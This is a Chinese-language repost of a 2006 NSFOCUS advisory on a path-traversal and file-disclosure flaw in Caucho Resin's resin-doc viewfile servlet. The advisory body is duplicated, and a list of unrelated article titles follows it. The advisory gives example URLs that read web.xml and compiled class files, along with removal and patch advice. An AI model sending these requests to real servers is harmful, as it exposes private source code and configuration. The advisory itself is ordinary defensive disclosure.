Caucho Resin viewfile远程文件及路径泄露漏洞
来源:百度文库 编辑:神马文学网 时间:2024/05/06 11:36:05
转自:绿盟科技
原文地址:http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=8828
发布日期:2006-05-16
更新日期:2006-05-17
受影响系统:Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10不受影响系统:Caucho Technology Resin v3.0.19描述:BUGTRAQ ID:18007
Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。
Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight
viewfile servlet可以无需参数在Web主目录中浏览任意文件:
http://targetsystem/resin-doc/viewfile/?file=index.jsp
攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:
http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
请求中错误的路径还会泄漏安装的绝对路径:
File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
<*来源:Joseph Pierini (joep@scanalert.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114780293620632&w=2
*>
测试方法:警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
http://www.example.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
建议:临时解决方法:
* 从生产系统中删除resin-doc.war文件,不要使用默认的配置文件部署。
厂商补丁:
Caucho Technology
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.caucho.com/download/
原文地址:http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=8828
发布日期:2006-05-16
更新日期:2006-05-17
受影响系统:Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10不受影响系统:Caucho Technology Resin v3.0.19描述:BUGTRAQ ID:18007
Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。
Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight
viewfile servlet可以无需参数在Web主目录中浏览任意文件:
http://targetsystem/resin-doc/viewfile/?file=index.jsp
攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:
http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
请求中错误的路径还会泄漏安装的绝对路径:
File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
<*来源:Joseph Pierini (joep@scanalert.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114780293620632&w=2
*>
测试方法:警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
http://www.example.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
建议:临时解决方法:
* 从生产系统中删除resin-doc.war文件,不要使用默认的配置文件部署。
厂商补丁:
Caucho Technology
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.caucho.com/download/
Caucho Resin viewfile远程文件及路径泄露漏洞
物理路径泄露的探讨
远程下载文件
IIS 5.0 SEARCH 方法远程攻击漏洞
IIS5.0 .printer远程溢出漏洞
认识电脑文件路径
VB.NET中获取指定文件夹中的文件及路径 VB.NET
[图]雅虎裁员指导文件泄露
泄露上网行踪的“index.dat”文件
泄露上网行踪的“index.dat”文件
泄露上网行踪的“index.dat”文件.............
美国绝密外交文件如何泄露
美国绝密外交文件如何泄露
巧妙清除本地和远程日志文件
bash脚本中取文件路径(文件名)
无法删除文件找不到指定路径
漏洞!
共同文件有漏洞 朝鲜弃核诚意并不高
PowerPoint出现新的0-day漏洞 可能允许远程执行代码
Java远程通讯可选技术及原理
Java远程通讯可选技术及原理
Java远程通讯可选技术及原理
Java远程通讯可选技术及原理
机密文件泄露:未来5年A股走势路线图